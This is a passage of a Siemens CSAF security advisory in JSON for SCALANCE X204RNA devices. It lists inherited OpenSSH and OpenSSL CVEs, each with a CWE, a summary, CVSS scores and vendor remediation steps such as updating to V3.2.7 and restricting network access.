(6GK5204-0BS00-3LA3)", "product_id": "CSAFPID-0004", "product_identification_helper": { "model_numbers": [ "6GK5204-0BS00-3LA3" ] } } } ], "category": "product_name", "name": "SCALANCE X204RNA EEC (PRP) (6GK5204-0BS00-3LA3)" }, { "branches": [ { "category": "product_version_range", "name": "\u003c V3.2.7", "product": { "name": "SCALANCE X204RNA EEC (PRP/HSR) (6GK5204-0BS00-3PA3)", "product_id": "CSAFPID-0005", "product_identification_helper": { "model_numbers": [ "6GK5204-0BS00-3PA3" ] } } } ], "category": "product_name", "name": "SCALANCE X204RNA EEC (PRP/HSR) (6GK5204-0BS00-3PA3)" } ], "category": "vendor", "name": "Siemens" } ] }, "vulnerabilities": [ { "cve": "CVE-2003-0190", "cwe": { "id": "CWE-208", "name": "Observable Timing Discrepancy" }, "notes": [ { "category": "summary", "text": "OpenSSH-portable (OpenSSH) 3.6.1p1 and earlier with PAM support enabled immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2003-0190" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2003-0190" }, { "cve": "CVE-2003-1562", "cwe": { "id": "CWE-362", "name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)" }, "notes": [ { "category": "summary", "text": "sshd in OpenSSH 3.6.1p2 and earlier, when PermitRootLogin is disabled and using PAM keyboard-interactive authentication, does not insert a delay after a root login attempt with the correct password, which makes it easier for remote attackers to use timing differences to determine if the password step of a multi-step authentication is successful, a different vulnerability than CVE-2003-0190.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2003-1562" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 8.1, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2003-1562" }, { "cve": "CVE-2014-8176", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "notes": [ { "category": "summary", "text": "The dtls1_clear_queues function in ssl/d1_lib.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h frees data structures without considering that application data can arrive between a ChangeCipherSpec message and a Finished message, which allows remote DTLS peers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unexpected application data.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-8176" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.3, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2014-8176" }, { "cve": "CVE-2015-0207", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "notes": [ { "category": "summary", "text": "The dtls1_listen function in d1_lib.c in OpenSSL 1.0.2 before 1.0.2a does not properly isolate the state information of independent data streams, which allows remote attackers to cause a denial of service (application crash) via crafted DTLS traffic, as demonstrated by DTLS 1.0 traffic to a DTLS 1.2 server.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0207" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-0207" }, { "cve": "CVE-2015-0208", "cwe": { "id": "CWE-476", "name": "NULL Pointer Dereference" }, "notes": [ { "category": "summary", "text": "The ASN.1 signature-verification implementation in the rsa_item_verify function in crypto/rsa/rsa_ameth.c in OpenSSL 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted RSA PSS parameters to an endpoint that uses the certificate-verification feature.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0208" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-0208" }, { "cve": "CVE-2015-0209", "cwe": { "id": "CWE-416", "name": "Use After Free" }, "notes": [ { "category": "summary", "text": "Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0209" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.3, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-0209" }, { "cve": "CVE-2015-0285", "cwe": { "id": "CWE-335", "name": "Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG)" }, "notes": [ { "category": "summary", "text": "The ssl3_client_hello function in s3_clnt.c in OpenSSL 1.0.2 before 1.0.2a does not ensure that the PRNG is seeded before proceeding with a handshake, which makes it easier for remote attackers to defeat cryptographic protection mechanisms by sniffing the network and then conducting a brute-force attack.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0285" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 4.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-0285" }, { "cve": "CVE-2015-0286", "cwe": { "id": "CWE-1024", "name": "Comparison of Incompatible Types" }, "notes": [ { "category": "summary", "text": "The ASN1_TYPE_cmp function in crypto/asn1/a_type.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly perform boolean-type comparisons, which allows remote attackers to cause a denial of service (invalid read operation and application crash) via a crafted X.509 certificate to an endpoint that uses the certificate-verification feature.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0286" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-0286" }, { "cve": "CVE-2015-0287", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "notes": [ { "category": "summary", "text": "The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not reinitialize CHOICE and ADB data structures, which might allow attackers to cause a denial of service (invalid write operation and memory corruption) by leveraging an application that relies on ASN.1 structure reuse.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0287" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-0287" }, { "cve": "CVE-2015-0288", "cwe": { "id": "CWE-476", "name": "NULL Pointer Dereference" }, "notes": [ { "category": "summary", "text": "The X509_to_X509_REQ function in crypto/x509/x509_req.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow attackers to cause a denial of service (NULL pointer dereference and application crash) via an invalid certificate key.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0288" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-0288" }, { "cve": "CVE-2015-0289", "cwe": { "id": "CWE-476", "name": "NULL Pointer Dereference" }, "notes": [ { "category": "summary", "text": "The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly handle a lack of outer ContentInfo, which allows attackers to cause a denial of service (NULL pointer dereference and application crash) by leveraging an application that processes arbitrary PKCS#7 data and providing malformed data with ASN.1 encoding, related to crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0289" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-0289" }, { "cve": "CVE-2015-0290", "cwe": { "id": "CWE-476", "name": "NULL Pointer Dereference" }, "notes": [ { "category": "summary", "text": "The multi-block feature in the ssl3_write_bytes function in s3_pkt.c in OpenSSL 1.0.2 before 1.0.2a on 64-bit x86 platforms with AES NI support does not properly handle certain non-blocking I/O cases, which allows remote attackers to cause a denial of service (pointer corruption and application crash) via unspecified vectors.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0290" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, 